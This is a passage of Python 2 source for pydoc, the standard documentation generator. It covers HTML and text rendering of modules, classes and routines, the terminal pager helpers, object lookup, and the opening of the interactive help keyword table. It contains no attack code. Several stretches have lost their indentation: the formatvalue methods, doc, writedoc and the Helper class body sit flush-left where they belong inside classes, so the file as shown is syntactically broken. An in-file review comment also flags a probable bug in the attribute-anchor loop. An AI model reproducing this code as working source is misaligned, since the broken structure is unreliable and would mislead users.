        for key, value in inspect.getmembers(object, inspect.isclass):
            # if __all__ exists, believe it. Otherwise use old heuristic.
            if (all is not None or
                (inspect.getmodule(value) or object) is object):
                if visiblename(key, all, object):
                    classes.append((key, value))
                    cdict[key] = cdict[value] = '#' + key
        for key, value in classes:
            # Also map bases defined in other modules to cross-file anchors.
            # (note: this inner loop deliberately rebinds 'key' to the
            # base-class name)
            for base in value.__bases__:
                key, modname = base.__name__, base.__module__
                module = sys.modules.get(modname)
                if modname != name and module and hasattr(module, key):
                    if getattr(module, key) is base:
                        if not key in cdict:
                            cdict[key] = cdict[base] = modname + '.html#' + key
        funcs, fdict = [], {}
        for key, value in inspect.getmembers(object, inspect.isroutine):
            # if __all__ exists, believe it. Otherwise use old heuristic.
            if (all is not None or
                inspect.isbuiltin(value) or inspect.getmodule(value) is object):
                if visiblename(key, all, object):
                    funcs.append((key, value))
                    fdict[key] = '#-' + key
                    if inspect.isfunction(value): fdict[value] = fdict[key]
        data = []
        for key, value in inspect.getmembers(object, isdata):
            if visiblename(key, all, object):
                data.append((key, value))
        doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
        doc = doc and '<tt>%s</tt>' % doc
        result = result + '<p>%s</p>\n' % doc
        # Emit the big colored sections in a fixed order.
        if hasattr(object, '__path__'):
            modpkgs = []
            for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
                modpkgs.append((modname, name, ispkg, 0))
            modpkgs.sort()
            contents = self.multicolumn(modpkgs, self.modpkglink)
            result = result + self.bigsection(
                'Package Contents', '#ffffff', '#aa55cc', contents)
        elif modules:
            contents = self.multicolumn(
                modules, lambda key_value, s=self: s.modulelink(key_value[1]))
            result = result + self.bigsection(
                'Modules', '#ffffff', '#aa55cc', contents)
        if classes:
            classlist = map(lambda key_value: key_value[1], classes)
            contents = [
                self.formattree(inspect.getclasstree(classlist, 1), name)]
            for key, value in classes:
                contents.append(self.document(value, key, name, fdict, cdict))
            result = result + self.bigsection(
                'Classes', '#ffffff', '#ee77aa', join(contents))
        if funcs:
            contents = []
            for key, value in funcs:
                contents.append(self.document(value, key, name, fdict, cdict))
            result = result + self.bigsection(
                'Functions', '#ffffff', '#eeaa77', join(contents))
        if data:
            contents = []
            for key, value in data:
                contents.append(self.docother(value, key))
            result = result + self.bigsection(
                'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
        if hasattr(object, '__author__'):
            contents = self.markup(_binstr(object.__author__), self.preformat)
            result = result + self.bigsection(
                'Author', '#ffffff', '#7799ee', contents)
        if hasattr(object, '__credits__'):
            contents = self.markup(_binstr(object.__credits__), self.preformat)
            result = result + self.bigsection(
                'Credits', '#ffffff', '#7799ee', contents)
        return result
    def docclass(self, object, name=None, mod=None, funcs={}, classes={},
                 *ignored):
        """Produce HTML documentation for a class object."""
        realname = object.__name__
        name = name or realname
        bases = object.__bases__
        contents = []
        push = contents.append
        # Cute little class to pump out a horizontal rule between sections.
        class HorizontalRule:
            def __init__(self):
                self.needone = 0
            def maybe(self):
                if self.needone:
                    push('<hr>\n')
                self.needone = 1
        hr = HorizontalRule()
        # List the mro, if non-trivial.
        mro = deque(inspect.getmro(object))
        if len(mro) > 2:
            hr.maybe()
            push('<dl><dt>Method resolution order:</dt>\n')
            for base in mro:
                push('<dd>%s</dd>\n' % self.classlink(base,
                                                      object.__module__))
            push('</dl>\n')
        # The three spill* helpers each consume the attrs matching their
        # predicate, emit documentation for them, and return the rest.
        def spill(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    try:
                        value = getattr(object, name)
                    except Exception:
                        # Some descriptors may meet a failure in their __get__.
                        # (bug #1785)
                        push(self._docdescriptor(name, value, mod))
                    else:
                        push(self.document(value, name, mod,
                                           funcs, classes, mdict, object))
                    push('\n')
            return attrs
        def spilldescriptors(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    push(self._docdescriptor(name, value, mod))
            return attrs
        def spilldata(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    base = self.docother(getattr(object, name), name, mod)
                    if (hasattr(value, '__call__') or
                            inspect.isdatadescriptor(value)):
                        doc = getattr(value, "__doc__", None)
                    else:
                        doc = None
                    if doc is None:
                        push('<dl><dt>%s</dl>\n' % base)
                    else:
                        doc = self.markup(getdoc(value), self.preformat,
                                          funcs, classes, mdict)
                        doc = '<dd><tt>%s</tt>' % doc
                        push('<dl><dt>%s%s</dl>\n' % (base, doc))
                    push('\n')
            return attrs
        attrs = filter(lambda data: visiblename(data[0], obj=object),
                       classify_class_attrs(object))
        # mdict maps attribute names (and, when hashable, their values)
        # to same-page anchors used by markup()'s self.name links.
        mdict = {}
        for key, kind, homecls, value in attrs:
            mdict[key] = anchor = '#' + name + '-' + key
            try:
                # NOTE(review): 'name' here is the class name, so every
                # iteration fetches the same attribute; 'key' looks like
                # the intended variable -- confirm against upstream
                # before changing.
                value = getattr(object, name)
            except Exception:
                # Some descriptors may meet a failure in their __get__.
                # (bug #1785)
                pass
            try:
                # The value may not be hashable (e.g., a data attr with
                # a dict or list value).
                mdict[value] = anchor
            except TypeError:
                pass
        # Walk the MRO, documenting the attributes each class contributes.
        while attrs:
            if mro:
                thisclass = mro.popleft()
            else:
                thisclass = attrs[0][2]
            attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
            if thisclass is __builtin__.object:
                attrs = inherited
                continue
            elif thisclass is object:
                tag = 'defined here'
            else:
                tag = 'inherited from %s' % self.classlink(thisclass,
                                                           object.__module__)
            tag += ':<br>\n'
            # Sort attrs by name.
            try:
                attrs.sort(key=lambda t: t[0])
            except TypeError:
                attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
            # Pump out the attrs, segregated by kind.
            attrs = spill('Methods %s' % tag, attrs,
                          lambda t: t[1] == 'method')
            attrs = spill('Class methods %s' % tag, attrs,
                          lambda t: t[1] == 'class method')
            attrs = spill('Static methods %s' % tag, attrs,
                          lambda t: t[1] == 'static method')
            attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
                                     lambda t: t[1] == 'data descriptor')
            attrs = spilldata('Data and other attributes %s' % tag, attrs,
                              lambda t: t[1] == 'data')
            assert attrs == []
            attrs = inherited
        contents = ''.join(contents)
        if name == realname:
            title = '<a name="%s">class <strong>%s</strong></a>' % (
                name, realname)
        else:
            title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
                name, name, realname)
        if bases:
            parents = []
            for base in bases:
                parents.append(self.classlink(base, object.__module__))
            title = title + '(%s)' % join(parents, ', ')
        doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
        doc = doc and '<tt>%s<br> </tt>' % doc
        return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
    def docroutine(self, object, name=None, mod=None,
                   funcs={}, classes={}, methods={}, cl=None):
        """Produce HTML documentation for a function or method object."""
        realname = object.__name__
        name = name or realname
        # Anchor is '<ClassName>-<name>' for methods, '-<name>' otherwise.
        anchor = (cl and cl.__name__ or '') + '-' + name
        note = ''
        skipdocs = 0
        if inspect.ismethod(object):
            # Python 2 bound/unbound method attributes (im_class/im_self).
            imclass = object.im_class
            if cl:
                if imclass is not cl:
                    note = ' from ' + self.classlink(imclass, mod)
            else:
                if object.im_self is not None:
                    note = ' method of %s instance' % self.classlink(
                        object.im_self.__class__, mod)
                else:
                    note = ' unbound %s method' % self.classlink(imclass,mod)
            object = object.im_func
        if name == realname:
            title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
        else:
            # Name differs from the function's own name: show an alias,
            # linking back to the real definition when it is on this page.
            if (cl and realname in cl.__dict__ and
                cl.__dict__[realname] is object):
                reallink = '<a href="#%s">%s</a>' % (
                    cl.__name__ + '-' + realname, realname)
                skipdocs = 1
            else:
                reallink = realname
            title = '<a name="%s"><strong>%s</strong></a> = %s' % (
                anchor, name, reallink)
        if inspect.isfunction(object):
            args, varargs, varkw, defaults = inspect.getargspec(object)
            argspec = inspect.formatargspec(
                args, varargs, varkw, defaults, formatvalue=self.formatvalue)
            if realname == '<lambda>':
                title = '<strong>%s</strong> <em>lambda</em> ' % name
                argspec = argspec[1:-1] # remove parentheses
        else:
            # Built-ins and other routines expose no introspectable signature.
            argspec = '(...)'
        decl = title + argspec + (note and self.grey(
            '<font face="helvetica, arial">%s</font>' % note))
        if skipdocs:
            return '<dl><dt>%s</dt></dl>\n' % decl
        else:
            doc = self.markup(
                getdoc(object), self.preformat, funcs, classes, methods)
            doc = doc and '<dd><tt>%s</tt></dd>' % doc
            return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
    def _docdescriptor(self, name, value, mod):
        # Shared helper: render a descriptor as a <dl> with optional doc text.
        results = []
        push = results.append
        if name:
            push('<dl><dt><strong>%s</strong></dt>\n' % name)
        if value.__doc__ is not None:
            doc = self.markup(getdoc(value), self.preformat)
            push('<dd><tt>%s</tt></dd>\n' % doc)
        push('</dl>\n')
        return ''.join(results)

    def docproperty(self, object, name=None, mod=None, cl=None):
        """Produce html documentation for a property."""
        return self._docdescriptor(name, object, mod)

    def docother(self, object, name=None, mod=None, *ignored):
        """Produce HTML documentation for a data object."""
        lhs = name and '<strong>%s</strong> = ' % name or ''
        return lhs + self.repr(object)

    def docdata(self, object, name=None, mod=None, cl=None):
        """Produce html documentation for a data descriptor."""
        return self._docdescriptor(name, object, mod)
    def index(self, dir, shadowed=None):
        """Generate an HTML index for a directory of modules."""
        modpkgs = []
        if shadowed is None: shadowed = {}
        for importer, name, ispkg in pkgutil.iter_modules([dir]):
            # A name already in 'shadowed' was seen earlier on the path,
            # so this occurrence is greyed out by modpkglink.
            modpkgs.append((name, '', ispkg, name in shadowed))
            shadowed[name] = 1
        modpkgs.sort()
        contents = self.multicolumn(modpkgs, self.modpkglink)
        return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
    """Class for safely making a text representation of a Python object."""
    def __init__(self):
        Repr.__init__(self)
        # Tighter truncation limits than Repr's defaults keep output short.
        self.maxlist = self.maxtuple = 20
        self.maxdict = 10
        self.maxstring = self.maxother = 100
    def repr1(self, x, level):
        # Dispatch to a type-specific repr_<typename> method when one
        # exists, else fall back to a truncated generic repr.
        if hasattr(type(x), '__name__'):
            methodname = 'repr_' + join(split(type(x).__name__), '_')
            if hasattr(self, methodname):
                return getattr(self, methodname)(x, level)
        return cram(stripid(repr(x)), self.maxother)
    def repr_string(self, x, level):
        test = cram(x, self.maxstring)
        testrepr = repr(test)
        if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
            # Backslashes are only literal in the string and are never
            # needed to make any special characters, so show a raw string.
            return 'r' + testrepr[0] + test + testrepr[0]
        return testrepr
    repr_str = repr_string
    def repr_instance(self, x, level):
        try:
            return cram(stripid(repr(x)), self.maxstring)
        except:
            # repr() of a broken object may raise anything; placeholder.
            return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
    """Formatter class for text documentation."""

    # ------------------------------------------- text formatting utilities

    # Shared repr helper bound once at class level.
    _repr_instance = TextRepr()
    repr = _repr_instance.repr

    def bold(self, text):
        """Format a string in bold by overstriking."""
        # ch + backspace + ch is the classic overstrike convention
        # understood by terminal pagers such as 'less'.
        return join(map(lambda ch: ch + '\b' + ch, text), '')

    def indent(self, text, prefix=' '):
        """Indent text by prepending a given prefix to each line."""
        # NOTE(review): upstream pydoc uses a four-space default prefix;
        # whitespace in this copy appears collapsed -- confirm.
        if not text: return ''
        lines = split(text, '\n')
        lines = map(lambda line, prefix=prefix: prefix + line, lines)
        if lines: lines[-1] = rstrip(lines[-1])
        return join(lines, '\n')

    def section(self, title, contents):
        """Format a section with a given heading."""
        return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
    def formattree(self, tree, modname, parent=None, prefix=''):
        """Render in text a class tree as returned by inspect.getclasstree()."""
        result = ''
        for entry in tree:
            if type(entry) is type(()):
                # (class, bases) tuple: one line per class.
                c, bases = entry
                result = result + prefix + classname(c, modname)
                if bases and bases != (parent,):
                    parents = map(lambda c, m=modname: classname(c, m), bases)
                    result = result + '(%s)' % join(parents, ', ')
                result = result + '\n'
            elif type(entry) is type([]):
                # Nested list: indent subclasses of the preceding class 'c'.
                result = result + self.formattree(
                    entry, modname, c, prefix + ' ')
        return result
    def docmodule(self, object, name=None, mod=None):
        """Produce text documentation for a given module object."""
        name = object.__name__ # ignore the passed-in name
        synop, desc = splitdoc(getdoc(object))
        result = self.section('NAME', name + (synop and ' - ' + synop))
        try:
            all = object.__all__
        except AttributeError:
            all = None
        try:
            file = inspect.getabsfile(object)
        except TypeError:
            file = '(built-in)'
        result = result + self.section('FILE', file)
        docloc = self.getdocloc(object)
        if docloc is not None:
            result = result + self.section('MODULE DOCS', docloc)
        if desc:
            result = result + self.section('DESCRIPTION', desc)
        classes = []
        for key, value in inspect.getmembers(object, inspect.isclass):
            # if __all__ exists, believe it. Otherwise use old heuristic.
            if (all is not None
                or (inspect.getmodule(value) or object) is object):
                if visiblename(key, all, object):
                    classes.append((key, value))
        funcs = []
        for key, value in inspect.getmembers(object, inspect.isroutine):
            # if __all__ exists, believe it. Otherwise use old heuristic.
            if (all is not None or
                inspect.isbuiltin(value) or inspect.getmodule(value) is object):
                if visiblename(key, all, object):
                    funcs.append((key, value))
        data = []
        for key, value in inspect.getmembers(object, isdata):
            if visiblename(key, all, object):
                data.append((key, value))
        modpkgs = []
        modpkgs_names = set()
        if hasattr(object, '__path__'):
            for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
                modpkgs_names.add(modname)
                if ispkg:
                    modpkgs.append(modname + ' (package)')
                else:
                    modpkgs.append(modname)
            modpkgs.sort()
            result = result + self.section(
                'PACKAGE CONTENTS', join(modpkgs, '\n'))
        # Detect submodules as sometimes created by C extensions
        submodules = []
        for key, value in inspect.getmembers(object, inspect.ismodule):
            if value.__name__.startswith(name + '.') and key not in modpkgs_names:
                submodules.append(key)
        if submodules:
            submodules.sort()
            result = result + self.section(
                'SUBMODULES', join(submodules, '\n'))
        if classes:
            classlist = map(lambda key_value: key_value[1], classes)
            contents = [self.formattree(
                inspect.getclasstree(classlist, 1), name)]
            for key, value in classes:
                contents.append(self.document(value, key, name))
            result = result + self.section('CLASSES', join(contents, '\n'))
        if funcs:
            contents = []
            for key, value in funcs:
                contents.append(self.document(value, key, name))
            result = result + self.section('FUNCTIONS', join(contents, '\n'))
        if data:
            contents = []
            for key, value in data:
                contents.append(self.docother(value, key, name, maxlen=70))
            result = result + self.section('DATA', join(contents, '\n'))
        if hasattr(object, '__version__'):
            version = _binstr(object.__version__)
            # Strip CVS-style '$Revision: ... $' markers down to the number.
            if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
                version = strip(version[11:-1])
            result = result + self.section('VERSION', version)
        if hasattr(object, '__date__'):
            result = result + self.section('DATE', _binstr(object.__date__))
        if hasattr(object, '__author__'):
            result = result + self.section('AUTHOR', _binstr(object.__author__))
        if hasattr(object, '__credits__'):
            result = result + self.section('CREDITS', _binstr(object.__credits__))
        return result
    def docclass(self, object, name=None, mod=None, *ignored):
        """Produce text documentation for a given class object."""
        realname = object.__name__
        name = name or realname
        bases = object.__bases__
        def makename(c, m=object.__module__):
            return classname(c, m)
        if name == realname:
            title = 'class ' + self.bold(realname)
        else:
            title = self.bold(name) + ' = class ' + realname
        if bases:
            parents = map(makename, bases)
            title = title + '(%s)' % join(parents, ', ')
        doc = getdoc(object)
        contents = doc and [doc + '\n'] or []
        push = contents.append
        # List the mro, if non-trivial.
        mro = deque(inspect.getmro(object))
        if len(mro) > 2:
            push("Method resolution order:")
            for base in mro:
                push(' ' + makename(base))
            push('')
        # Cute little class to pump out a horizontal rule between sections.
        class HorizontalRule:
            def __init__(self):
                self.needone = 0
            def maybe(self):
                if self.needone:
                    push('-' * 70)
                self.needone = 1
        hr = HorizontalRule()
        # The three spill* helpers each consume the attrs matching their
        # predicate, emit documentation for them, and return the rest.
        def spill(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    try:
                        value = getattr(object, name)
                    except Exception:
                        # Some descriptors may meet a failure in their __get__.
                        # (bug #1785)
                        push(self._docdescriptor(name, value, mod))
                    else:
                        push(self.document(value,
                                           name, mod, object))
            return attrs
        def spilldescriptors(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    push(self._docdescriptor(name, value, mod))
            return attrs
        def spilldata(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    if (hasattr(value, '__call__') or
                            inspect.isdatadescriptor(value)):
                        doc = getdoc(value)
                    else:
                        doc = None
                    push(self.docother(getattr(object, name),
                                       name, mod, maxlen=70, doc=doc) + '\n')
            return attrs
        attrs = filter(lambda data: visiblename(data[0], obj=object),
                       classify_class_attrs(object))
        # Walk the MRO, documenting the attributes each class contributes.
        while attrs:
            if mro:
                thisclass = mro.popleft()
            else:
                thisclass = attrs[0][2]
            attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
            if thisclass is __builtin__.object:
                attrs = inherited
                continue
            elif thisclass is object:
                tag = "defined here"
            else:
                tag = "inherited from %s" % classname(thisclass,
                                                      object.__module__)
            # Sort attrs by name.
            attrs.sort()
            # Pump out the attrs, segregated by kind.
            attrs = spill("Methods %s:\n" % tag, attrs,
                          lambda t: t[1] == 'method')
            attrs = spill("Class methods %s:\n" % tag, attrs,
                          lambda t: t[1] == 'class method')
            attrs = spill("Static methods %s:\n" % tag, attrs,
                          lambda t: t[1] == 'static method')
            attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
                                     lambda t: t[1] == 'data descriptor')
            attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
                              lambda t: t[1] == 'data')
            assert attrs == []
            attrs = inherited
        contents = '\n'.join(contents)
        if not contents:
            return title + '\n'
        return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
    def docroutine(self, object, name=None, mod=None, cl=None):
        """Produce text documentation for a function or method object."""
        realname = object.__name__
        name = name or realname
        note = ''
        skipdocs = 0
        if inspect.ismethod(object):
            # Python 2 bound/unbound method attributes (im_class/im_self).
            imclass = object.im_class
            if cl:
                if imclass is not cl:
                    note = ' from ' + classname(imclass, mod)
            else:
                if object.im_self is not None:
                    note = ' method of %s instance' % classname(
                        object.im_self.__class__, mod)
                else:
                    note = ' unbound %s method' % classname(imclass,mod)
            object = object.im_func
        if name == realname:
            title = self.bold(realname)
        else:
            # Alias: skip the docstring when the real definition is
            # documented under its own name in the same class.
            if (cl and realname in cl.__dict__ and
                cl.__dict__[realname] is object):
                skipdocs = 1
            title = self.bold(name) + ' = ' + realname
        if inspect.isfunction(object):
            args, varargs, varkw, defaults = inspect.getargspec(object)
            argspec = inspect.formatargspec(
                args, varargs, varkw, defaults, formatvalue=self.formatvalue)
            if realname == '<lambda>':
                title = self.bold(name) + ' lambda '
                argspec = argspec[1:-1] # remove parentheses
        else:
            # Built-ins and other routines expose no introspectable signature.
            argspec = '(...)'
        decl = title + argspec + note
        if skipdocs:
            return decl + '\n'
        else:
            doc = getdoc(object) or ''
            return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
    def _docdescriptor(self, name, value, mod):
        # Shared helper: render a descriptor as bold name plus indented doc.
        results = []
        push = results.append
        if name:
            push(self.bold(name))
            push('\n')
        doc = getdoc(value) or ''
        if doc:
            push(self.indent(doc))
            push('\n')
        return ''.join(results)

    def docproperty(self, object, name=None, mod=None, cl=None):
        """Produce text documentation for a property."""
        return self._docdescriptor(name, object, mod)

    def docdata(self, object, name=None, mod=None, cl=None):
        """Produce text documentation for a data descriptor."""
        return self._docdescriptor(name, object, mod)

    def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
        """Produce text documentation for a data object."""
        repr = self.repr(object)
        if maxlen:
            # Chop the repr so 'name = repr' fits within maxlen columns.
            line = (name and name + ' = ' or '') + repr
            chop = maxlen - len(line)
            if chop < 0: repr = repr[:chop] + '...'
        line = (name and self.bold(name) + ' = ' or '') + repr
        if doc is not None:
            line += '\n' + self.indent(str(doc))
        return line
# --------------------------------------------------------- user interfaces
def pager(text):
    """The first time this is called, determine what kind of pager to use."""
    # Self-replacing stub: the first call rebinds the global name 'pager'
    # to the concrete pager chosen by getpager(), then delegates to it.
    global pager
    pager = getpager()
    pager(text)
def getpager():
    """Decide what method to use for paging through text."""
    # Fall back to plain printing whenever stdout is not a real file
    # (Python 2's types.FileType) or stdin/stdout are not a terminal.
    if type(sys.stdout) is not types.FileType:
        return plainpager
    if not hasattr(sys.stdin, "isatty"):
        return plainpager
    if not sys.stdin.isatty() or not sys.stdout.isatty():
        return plainpager
    if 'PAGER' in os.environ:
        if sys.platform == 'win32': # pipes completely broken in Windows
            return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
        elif os.environ.get('TERM') in ('dumb', 'emacs'):
            return lambda text: pipepager(plain(text), os.environ['PAGER'])
        else:
            return lambda text: pipepager(text, os.environ['PAGER'])
    if os.environ.get('TERM') in ('dumb', 'emacs'):
        return plainpager
    if sys.platform == 'win32' or sys.platform.startswith('os2'):
        return lambda text: tempfilepager(plain(text), 'more <')
    if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
        return lambda text: pipepager(text, 'less')
    import tempfile
    (fd, filename) = tempfile.mkstemp()
    os.close(fd)
    try:
        # Probe for a working 'more' by running it on an empty temp file.
        if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
            return lambda text: pipepager(text, 'more')
        else:
            return ttypager
    finally:
        os.unlink(filename)
def plain(text):
    """Remove boldface formatting from text."""
    # bold() renders 'x' as 'x\bx' (overstrike); dropping every
    # char-plus-backspace pair restores the plain text.
    overstrike = re.compile('.\b')
    return overstrike.sub('', text)
def pipepager(text, cmd):
    """Page through text by feeding it to another program."""
    pipe = os.popen(cmd, 'w')
    try:
        pipe.write(_encode(text))
        pipe.close()
    except IOError:
        pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
    """Page through text by invoking a program on a temporary file.

    The file is removed once the pager command returns.
    """
    import tempfile
    # mkstemp creates the file atomically with a private mode, avoiding
    # the symlink/race vulnerability of the old tempfile.mktemp() name.
    fd, filename = tempfile.mkstemp()
    try:
        file = os.fdopen(fd, 'w')
        try:
            file.write(_encode(text))
        finally:
            file.close()
        os.system(cmd + ' "' + filename + '"')
    finally:
        os.unlink(filename)
def ttypager(text):
    """Page through text on a text terminal."""
    lines = plain(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))).split('\n')
    try:
        import tty
        fd = sys.stdin.fileno()
        old = tty.tcgetattr(fd)
        tty.setcbreak(fd)
        # cbreak mode: read single keystrokes without waiting for Enter.
        getchar = lambda: sys.stdin.read(1)
    except (ImportError, AttributeError):
        # No tty support (e.g. Windows): fall back to line-based input.
        tty = None
        getchar = lambda: sys.stdin.readline()[:-1][:1]
    try:
        try:
            h = int(os.environ.get('LINES', 0))
        except ValueError:
            h = 0
        if h <= 1:
            h = 25
        # r = index of the next unshown line; inc = lines per screenful.
        r = inc = h - 1
        sys.stdout.write(join(lines[:inc], '\n') + '\n')
        while lines[r:]:
            sys.stdout.write('-- more --')
            sys.stdout.flush()
            c = getchar()
            if c in ('q', 'Q'):
                sys.stdout.write('\r \r')
                break
            elif c in ('\r', '\n'):
                # Return/Enter: advance a single line.
                sys.stdout.write('\r \r' + lines[r] + '\n')
                r = r + 1
                continue
            if c in ('b', 'B', '\x1b'):
                # Back up two pages; the write below advances one again.
                r = r - inc - inc
                if r < 0: r = 0
            sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
            r = r + inc
    finally:
        # Always restore the terminal mode we saved above.
        if tty:
            tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
    """Simply print unformatted text. This is the ultimate fallback."""
    sys.stdout.write(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding)))
def describe(thing):
    """Produce a short description of the given thing."""
    if inspect.ismodule(thing):
        if thing.__name__ in sys.builtin_module_names:
            return 'built-in module ' + thing.__name__
        if hasattr(thing, '__path__'):
            return 'package ' + thing.__name__
        else:
            return 'module ' + thing.__name__
    if inspect.isbuiltin(thing):
        return 'built-in function ' + thing.__name__
    if inspect.isgetsetdescriptor(thing):
        return 'getset descriptor %s.%s.%s' % (
            thing.__objclass__.__module__, thing.__objclass__.__name__,
            thing.__name__)
    if inspect.ismemberdescriptor(thing):
        return 'member descriptor %s.%s.%s' % (
            thing.__objclass__.__module__, thing.__objclass__.__name__,
            thing.__name__)
    if inspect.isclass(thing):
        return 'class ' + thing.__name__
    if inspect.isfunction(thing):
        return 'function ' + thing.__name__
    if inspect.ismethod(thing):
        return 'method ' + thing.__name__
    # Python 2 only: instances of old-style classes share one type.
    if type(thing) is types.InstanceType:
        return 'instance of ' + thing.__class__.__name__
    return type(thing).__name__
def locate(path, forceload=0):
    """Locate an object by name or dotted path, importing as necessary."""
    parts = [part for part in split(path, '.') if part]
    module, n = None, 0
    # Import the longest importable prefix of the dotted path...
    while n < len(parts):
        nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
        if nextmodule: module, n = nextmodule, n + 1
        else: break
    if module:
        object = module
    else:
        # Nothing importable: resolve against the builtin namespace.
        object = __builtin__
    # ...then walk the remaining parts with getattr.
    for part in parts[n:]:
        try:
            object = getattr(object, part)
        except AttributeError:
            return None
    return object
# --------------------------------------- interactive interpreter interface
# Module-level formatter singletons shared by the convenience functions.
text = TextDoc()
html = HTMLDoc()

# Sentinel type used to detect old-style (classic) class instances.
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())

def resolve(thing, forceload=0):
    """Given an object or a path to an object, get the object and its name."""
    if isinstance(thing, str):
        object = locate(thing, forceload)
        if object is None:
            raise ImportError, 'no Python documentation found for %r' % thing
        return object, thing
    else:
        name = getattr(thing, '__name__', None)
        return thing, name if isinstance(name, str) else None
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
    """Render text documentation, given an object or a path to an object."""
    object, name = resolve(thing, forceload)
    desc = describe(object)
    module = inspect.getmodule(object)
    if name and '.' in name:
        desc += ' in ' + name[:name.rfind('.')]
    elif module and module is not object:
        desc += ' in module ' + module.__name__
    if type(object) is _OLD_INSTANCE_TYPE:
        # If the passed object is an instance of an old-style class,
        # document its available methods instead of its value.
        object = object.__class__
    elif not (inspect.ismodule(object) or
              inspect.isclass(object) or
              inspect.isroutine(object) or
              inspect.isgetsetdescriptor(object) or
              inspect.ismemberdescriptor(object) or
              isinstance(object, property)):
        # If the passed object is a piece of data or an instance,
        # document its available methods instead of its value.
        object = type(object)
        desc += ' object'
    return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
# Render and page the documentation; never let import failures escape.
pager(render_doc(thing, title, forceload))
# Python 2 except syntax: bind the caught exception to `value`.
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
# Output file name is derived from the object name, e.g. "os.html".
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
# Report (but swallow) resolution/import failures, like doc() does.
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
    """Write out HTML documentation for all modules in a directory tree."""
    # `done` is kept for backward compatibility with older callers; the
    # walk below relies on pkgutil to enumerate each module exactly once.
    if done is None:
        done = {}
    for _importer, modname, _ispkg in pkgutil.walk_packages([dir], pkgpath):
        writedoc(modname)
    return
class Helper:
# Interactive "help>" session used by the interpreter's built-in help().
# Dispatches requests to keyword/symbol/topic tables below or to doc().
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
